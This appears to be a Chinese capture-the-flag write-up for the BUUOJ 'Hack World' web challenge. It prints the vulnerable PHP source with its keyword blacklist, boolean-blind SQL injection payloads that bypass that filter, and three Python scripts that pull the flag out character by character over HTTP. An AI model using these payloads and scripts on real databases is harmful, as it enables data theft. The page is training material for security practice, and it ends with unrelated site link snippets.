知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注

eg:

id=(ascii(substr((select(flag)from(flag)),1,1))<128)

0x01

看了网上的源码发现:

<?php

$dbuser='root';

$dbpass='root';

function safe($sql){

#被过滤的内容 函数基本没过滤

$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');

foreach($blackList as $blackitem){

if(stripos($sql,$blackitem)){

return False; } } return True;

} i

f(isset($_POST['id'])){

$id = $_POST['id'];

}else

{ die();

}

$db = mysql_connect("localhost",$dbuser,$dbpass); i

f(!$db){

die(mysql_error()); }

mysql_select_db("ctf",$db);

if(safe($id)){

$query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");

if($query){

$result = mysql_fetch_array($query);

if($result){

echo $result['content'];

}else{

echo "Error Occured When Fetch Result.";

}

}else{

var_dump($query);

} }else{

die("SQL Injection Checked."); }

过滤了一堆东西,可以看到很多函数没有过滤,

接下来就想办法借助函数构造注入就可以了。

借助substr函数截取flag中的内容,长度依次增加。用if函数判断截取出来的内容是什么,这里需要穷举。如果判断成功,返回1,否则返回2。

0x2解题

贴上wp脚本

import requests

import time

url是随时更新的,具体的以做题时候的为准

url = 'http://40c9be7a-36f0-4e80-94ca-d1ac9e121947.node1.buuoj.cn/index.php'

data = {"id":""}

flag = 'flag{'

i = 6

while True:

从可打印字符开始

begin = 32

end = 126

tmp = (begin+end)//2

while begin<end:

    print(begin,tmp,end)

    time.sleep(1)

    data["id"] = "if(ascii(substr((select       flag        from    flag),{},1))>{},1,2)".format(i,tmp)

    r = requests.post(url,data=data)

    if 'Hello' in r.text:

        begin = tmp+1

        tmp = (begin+end)//2

    else:

        end = tmp

        tmp = (begin+end)//2

flag+=chr(tmp)

print(flag)

i+=1

if flag[-1]=='}':

    break

0x03 解法二

看的网上的wp还有一种解法是通过异或

在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:

id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

附上脚本爆破

#!/usr/bin/python

#-*-coding:utf-8 -*-

import requests

import re

def flag_get(start,f,url):    #确定start位的字符

	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))'

	data = {'id': a }

	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'

	r= requests.post(url, data)

	s=r.text

	#print(s)

	if 'Hello' in s:

		return 1

	else:

		return 0

def flag_find(start,f,url): #确定

	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))'

	data = {'id': a }

	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'

	r= requests.post(url, data)

	s=r.text

	#print(s)

	if 'Hello' in s:

		return 1

	else:

		return 0

if __name__ == '__main__':

	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'

	flag_kouhao=125

	flag=''

	num=1       #从第num位开始爆破

	while 1:

		start=32   #ascii的起始范围(10进制)

		last=126   #ascii的终止范围(10进制)

		mid=int((start+last)/2)

		while 1:

			if(flag_get(num,flag_kouhao,url)):

				flag=flag+'}'

				print('flag     is    :'+flag)

				exit(1)

			print('strat is '+str(start))

			print(' mid  is '+str(mid))

			print('last  is '+str(last))

			print('****************************************')

			if(flag_find(num,mid,url)):

				start=mid

				mid=int((start+last)/2)

				if ((last-start)<5):

					break

			else:

				last=mid

				mid=int((start+last)/2)

				if ((last-start)<5):

					break

		print(start)

		print(last)

		print('****************************************')

		for i in range(start,last+1):

			print(i)

			if(flag_get(num,i,url)):

				f=chr(i)

				flag=flag+f

				print('****************************************')

				print(' num is '+str(num))

				print('char is '+f)

				print('flag is '+flag)

				print('****************************************')

				break

		num=num+1

	print(flag)

exp2:

coding:utf-8

import requests

from lxml import etree

def a():

url="http://b995ff2b-d867-4580-80c2-3fd1e4b25cb4.node3.buuoj.cn/"

flag="Hello, glzjin wants a girlfriend."

final=""

stop=0

for i in range(1,1290):

print(""50,i,""50)

stop=0

for j in range(32,129):

stop = j

data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}

re = requests.post(url=url,data=data).text.replace('\n','')

html = etree.HTML(re).xpath("//text()")

# print(">>",html)

if flag in html:

final+=chr(j)

print("\n\t\t\t\t",final)

break

     if stop >= 128:

        print("*"*50,"结束")

        print(">>",final)

        break

if name == 'main':

a()

参考链接

https://www.cnblogs.com/kevinbruce656/p/11342580.html

https://blog.csdn.net/weixin_43345082/article/details/99062970

[CISCN2019 华北赛区 Day2 Web1]Hack World的更多相关文章

  1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World

    目录 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 一.前言 二.正文 1.解题过程 2.解题方法 刷题记录:[CISCN2019 华北赛区 Day2 Web1] ...

  2. BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World

    id=0 id=1 id=2 id=3 发现结果不一样,尝试 : ">4","=4","<4" : 在自己的环境下验证一下: 爆 ...

  3. BUUOJ [CISCN2019 华北赛区 Day2 Web1]Hack World

    补一下这道题,顺便发篇博客 不知道今年国赛是什么时候,菜鸡还是来刷刷题好了 0X01 考点 SQL注入.盲注.数字型 0X02自己尝试 尝试输入1 赵师傅需要女朋友吗???随便都能有好吧 输入2 ?? ...

  4. 刷题[CISCN2019 华北赛区 Day2 Web1]Hack World

    解题思路 打开发现是很简单的页面,告诉了表名和列名,只需知道字段即可 尝试一下,输入1,2都有内容,后面无内容.输入1'让他报错,发现返回bool(false) 大概思路就是布尔型注入了,通过不断返回 ...

  5. [CISCN2019 华北赛区 Day2 Web1]Hack World 1详解

    打开题目, 我们开始尝试注入, 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do ...

  6. [CISCN2019 华北赛区 Day2 Web1]Hack World(二分法写布尔注入脚本)

    记一道布尔注入的题,存在过滤字符. 从题目看应该是一道注入题.提示存在flag表flag列. 输入1和2的返回结果不一样,可能是布尔注入. 简单用万能密码尝试了一下.提示SQL Injection C ...

  7. 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox

    目录 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox 一.涉及知识点 1.任意文件下载 2.PHAR反序列化RCE 二.解题方法 刷题记录:[CISCN2019 华北赛区 ...

  8. PHAR伪协议&&[CISCN2019 华北赛区 Day1 Web1]Dropbox

    PHAR:// PHP文件操作允许使用各种URL协议去访问文件路径:如data://,php://,等等 include('php://filter/read=convert.base64-encod ...

  9. BUUCTF | [CISCN2019 华北赛区 Day1 Web1]Dropbox

    步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { pr ...

随机推荐

  1. C#常用类库简介(二)

    原文出处:http://blog.csdn.net/weiwenhp/article/details/8140503 C#常用类库简介(一)的地址 System与mscorlib这两个dll中的类库是 ...

  2. docker 构建php-fpm IMages(dockerfile)

    好久没写blog   做什么?   复习nginx  zabbix  docker-compos mariadb  学习 jenkins ansible ELK  k8s (kubeadm)  好了也 ...

  3. sourceTree 生成公钥和私钥 然后拉项目代码

    第一步 用sourceTree生成公钥pub和私钥文件ppk    打开sourceTree -> 工具 -> 创建或导入ssh密钥 -> 点击generate -> 上面会显 ...

  4. 微信小程序调用用百度地图天气功能

    #小程序之调用百度地图天气功能 本篇博客主要介绍小程序在百度地图中获取天气信息,如有不全请指出.下面先上效果图 主要内容 百度地图API的个人密钥,也就是AK 请求百度地图API接口数据 获取到的信息 ...

  5. pandas中na_values与keep_default_na

    我们在使用pandas读取文件时,常会遇到某个字段为NaN. 一般情况下,这时因为文件中包含空值导致的,因为pandas默认会将 '-1.#IND', '1.#QNAN', '1.#IND', '-1 ...

  6. 九十一、SAP中ALV事件之五,查看状态栏,工具栏和功能键等

    一.我们按照说明,来到SE37功能模块,然后点击[转到]->[函数组]->[显示组] 二.按照说明输入SALV,点击勾选 三.点击主程序 四.点击主程序后,我们来到函数组页面,然后 五.我 ...

  7. 101-PHP二维数组的元素输出三,封装成函数

    <?php $arr=array(array(76,87,68), array(65,89,95), array(90,80,66), array(90,95,65),5,234,56,'Hel ...

  8. 那些年我们一起踩过的坑(javascript常见的陷阱)

    1.object最后一个逗号 定义object直接量或json,最后一个逗号多写了,在ie下会报错,高级浏览器则不会,给只使用chrome调试的同学敲个警钟.踩了无数次这个坑了.   2.自动加分号 ...

  9. 二、环境安装:yarn

    依赖管理工具安装yarn 可参考前几篇文章 1.必须安装nodejs 注意:安装nodejs稳定版本 2.安装cnpm用cnpm替代npm 地址:http://npm.taobao.org/安装cnp ...

  10. Promise 与 await 组合使用

    看例子就行了,废话不多说!   async function checkStatus(name){   return new Promise((resolve,reject) => {      ...